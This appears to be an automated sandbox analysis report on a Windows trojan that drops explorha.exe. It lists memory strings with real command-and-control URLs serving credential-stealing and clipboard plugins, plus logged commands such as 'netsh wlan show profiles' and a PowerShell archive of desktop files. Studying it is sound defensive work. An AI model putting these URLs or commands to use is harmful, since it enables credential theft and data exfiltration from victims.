                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.3041565537.0000000000C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllv
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2440652752.00000256D1295000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3037845134.0000000002D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
                                Source: rundll32.exe, 00000008.00000002.2440652752.00000256D1295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php-
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php2
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php27
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php3
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php6
                                Source: rundll32.exe, 00000008.00000002.2440937016.00000256D313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
                                Source: rundll32.exe, 00000008.00000002.2440652752.00000256D1263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1;BU)(A;OICI;GXGR;;;WD)D
                                Source: rundll32.exe, 00000008.00000002.2440937016.00000256D313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1s
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpd
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpded
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpg
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpk
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/ferences.SourceAumid
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/l
                                Source: powershell.exe, 0000000C.00000002.2422508148.000001A3CB17A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC6E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: powershell.exe, 0000000C.00000002.2422508148.000001A3CB17A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                                System Summary

                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name:
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: .idata
                                Source: explorha.exe.0.dr Static PE information: section name:
                                Source: explorha.exe.0.dr Static PE information: section name: .idata
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0087E227 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_0087E227
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File created: C:\Windows\Tasks\explorha.job
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_008A47C82_2_008A47C8
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008AA2206_2_008AA220
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A43306_2_008A4330
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008854816_2_00885481
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008824A36_2_008824A3
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008994E36_2_008994E3
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_009896806_2_00989680
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A86696_2_008A8669
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A47C86_2_008A47C8
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008878226_2_00887822
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_00882C926_2_00882C92
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A8DBB6_2_008A8DBB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_008A8EDB6_2_008A8EDB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_00864E606_2_00864E60
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll 3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll 12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: String function: 00E29750 appears 122 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0089A433 appears 46 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0087ECE3 appears 75 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0087F620 appears 81 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 0087EFE2 appears 83 times
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: String function: 00879750 appears 367 times
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeStatic PE information: Section: ZLIB complexity 0.9981358914209115
                                Source: explorha.exe.0.drStatic PE information: Section: ZLIB complexity 0.9981358914209115
                                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@17/21@0/1
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile created: C:\Users\user\AppData\Roaming\a091ec0a6e2227Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile created: C:\Users\user\AppData\Local\Temp\09fd851a4fJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: rundll32.exe, 00000008.00000002.2440652752.00000256D11F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: cred64[1].dll.6.dr, cred64.dll.6.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeReversingLabs: Detection: 44%
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeVirustotal: Detection: 54%
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: explorha.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeString found in binary or memory: %RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeR
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: mstask.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: dui70.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: duser.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: chartv.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: explorerframe.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                                Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
